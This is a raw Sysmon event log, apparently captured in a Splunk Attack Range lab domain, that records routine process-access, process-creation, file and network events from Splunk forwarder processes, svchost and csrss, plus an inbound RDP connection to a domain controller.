09:20:25.649{69CF5F33-7F28-614D-0C00-00000000FD01}7203228C:\Windows\system32\svchost.exe{69CF5F33-7F28-614D-1A00-00000000FD01}1836C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000980547Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:20:25.649{69CF5F33-7F28-614D-0C00-00000000FD01}7203228C:\Windows\system32\svchost.exe{69CF5F33-7F28-614D-1A00-00000000FD01}1836C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000980546Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:20:25.649{69CF5F33-7F28-614D-0C00-00000000FD01}7203228C:\Windows\system32\svchost.exe{69CF5F33-7F28-614D-1A00-00000000FD01}1836C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8fc1|c:\windows\system32\lsm.dll+8eb0|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000980545Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:20:25.649{69CF5F33-7F28-614D-0C00-00000000FD01}7203228C:\Windows\system32\svchost.exe{69CF5F33-7F28-614D-1A00-00000000FD01}1836C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8e6f|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000980544Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:20:25.649{69CF5F33-7F28-614D-0C00-00000000FD01}7203228C:\Windows\system32\svchost.exe{69CF5F33-7F28-614D-1A00-00000000FD01}1836C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000980543Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:20:25.649{69CF5F33-7F27-614D-0500-00000000FD01}408424C:\Windows\system32\csrss.exe{69CF5F33-8CD9-6151-FF79-00000000FD01}3240C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x8000000000000000980542Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:20:25.649{69CF5F33-7F28-614D-0C00-00000000FD01}7203228C:\Windows\system32\svchost.exe{69CF5F33-7F28-614D-1A00-00000000FD01}1836C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000980541Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:20:25.649{69CF5F33-7F28-614D-0C00-00000000FD01}7203228C:\Windows\system32\svchost.exe{69CF5F33-7F28-614D-1A00-00000000FD01}1836C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000980540Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:20:25.649{69CF5F33-7F29-614D-1D00-00000000FD01}19603060C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{69CF5F33-8CD9-6151-FF79-00000000FD01}3240C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 154100x8000000000000000980539Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:20:25.634{69CF5F33-8CD9-6151-FF79-00000000FD01}3240C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe8.0.2Active Directory monitorsplunk ApplicationSplunk Inc.splunk-admon.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{69CF5F33-7F27-614D-E703-000000000000}0x3e70SystemMD5=947139F3BB2AB70CAF692A60C7A3A735,SHA256=940554A0170A70F634689CC84B00C51AC0BCF773C9639E1305E3672441FC85C8,IMPHASH=357CEC18833E7FF2ABFB722902B13165{69CF5F33-7F29-614D-1D00-00000000FD01}1960C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 354300x8000000000000000980538Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:20:21.726{69CF5F33-7F33-614D-6600-00000000FD01}4076C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.15win-host-542.attackrange.local59498-false10.0.1.12-8000- 354300x80000000000000001054270Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:20:24.223{5EBD8912-8CC0-6151-0F00-00000000FD01}300C:\Windows\System32\svchost.exeNT AUTHORITY\NETWORK SERVICEtcpfalsefalse87.236.208.230-59837-false10.0.1.14win-dc-429.attackrange.local3389ms-wbt-server 10341000x8000000000000000980583Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:20:26.899{69CF5F33-7F2A-614D-2B00-00000000FD01}28562876C:\Windows\system32\conhost.exe{69CF5F33-8CDA-6151-017A-00000000FD01}312C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8ef|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 23542300x8000000000000000980582Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:20:26.899{69CF5F33-7F3A-614D-7000-00000000FD01}3160NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=B00464A687CB7A7409D1BCD9ACFEA340,SHA256=93968F77CB02A725D22D89490393E79C75E5847BFF36172189F14A749F9D61E5,IMPHASH=00000000000000000000000000000000falsetrue 10341000x8000000000000000980581Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:20:26.899{69CF5F33-7F28-614D-0C00-00000000FD01}7203228C:\Windows\system32\svchost.exe{69CF5F33-7F28-614D-1A00-00000000FD01}1836C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000980580Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:20:26.899{69CF5F33-7F28-614D-0C00-00000000FD01}7203228C:\Windows\system32\svchost.exe{69CF5F33-7F28-614D-1A00-00000000FD01}1836C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000980579Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:20:26.899{69CF5F33-7F28-614D-0C00-00000000FD01}7203228C:\Windows\system32\svchost.exe{69CF5F33-7F28-614D-1A00-00000000FD01}1836C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000980578Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:20:26.899{69CF5F33-7F28-614D-0C00-00000000FD01}7203228C:\Windows\system32\svchost.exe{69CF5F33-7F28-614D-1A00-00000000FD01}1836C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000980577Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:20:26.899{69CF5F33-7F28-614D-0C00-00000000FD01}7203228C:\Windows\system32\svchost.exe{69CF5F33-7F28-614D-1A00-00000000FD01}1836C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8fc1|c:\windows\system32\lsm.dll+8eb0|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000980576Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:20:26.899{69CF5F33-7F28-614D-0C00-00000000FD01}7203228C:\Windows\system32\svchost.exe{69CF5F33-7F28-614D-1A00-00000000FD01}1836C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8e6f|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000980575Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:20:26.899{69CF5F33-7F27-614D-0500-00000000FD01}408524C:\Windows\system32\csrss.exe{69CF5F33-8CDA-6151-017A-00000000FD01}312C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x8000000000000000980574Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:20:26.899{69CF5F33-7F28-614D-0C00-00000000FD01}7203228C:\Windows\system32\svchost.exe{69CF5F33-7F28-614D-1A00-00000000FD01}1836C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000980573Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:20:26.899{69CF5F33-7F28-614D-0C00-00000000FD01}7203228C:\Windows\system32\svchost.exe{69CF5F33-7F28-614D-1A00-00000000FD01}1836C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000980572Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:20:26.899{69CF5F33-7F29-614D-1D00-00000000FD01}19603060C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{69CF5F33-8CDA-6151-017A-00000000FD01}312C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000980571Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:20:26.899{69CF5F33-7F28-614D-0C00-00000000FD01}7203228C:\Windows\system32\svchost.exe{69CF5F33-7F28-614D-1A00-00000000FD01}1836C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 154100x8000000000000000980570Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:20:26.885{69CF5F33-8CDA-6151-017A-00000000FD01}312C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe10.0.10011.16384SplunkMonNoHandle Control ProgramWindows (R) Win 7 DDK driverWindows (R) Win 7 DDK providerSplunkMonNoHandle.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{69CF5F33-7F27-614D-E703-000000000000}0x3e70SystemMD5=BF28C74E12839E40CD89696C7CB01573,SHA256=6187325F302F232DE582FE28E0E0D2B292AB8122C3356C9CE295A482D7B93EA3,IMPHASH=27776F2813155A6CF34F6A075A0C2EC8{69CF5F33-7F29-614D-1D00-00000000FD01}1960C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 23542300x8000000000000000980569Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:20:26.868{69CF5F33-7F3A-614D-7000-00000000FD01}3160NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=F8EA2170DCF17748A8D132A5BC9BE836,SHA256=159C048A73DA83782A0191BA120A38248300B4C37F3F21D2CBF7432BAC941A37,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000980568Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:20:26.868{69CF5F33-7F3A-614D-7000-00000000FD01}3160NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=CAABCDA058D9870E6E8CC84C8401A118,SHA256=BD53CA5E44F78D617E1F89D78B9CE4883085EE5FE4B9A2AE1F97C7B2A54B3E32,IMPHASH=00000000000000000000000000000000falsetrue 10341000x8000000000000000980567Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:20:26.493{69CF5F33-8CDA-6151-007A-00000000FD01}15201004C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe{69CF5F33-7F29-614D-1D00-00000000FD01}1960C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe0x101400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+55e675|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+55e1a6|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+6b453|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+8e8530|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000980566Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 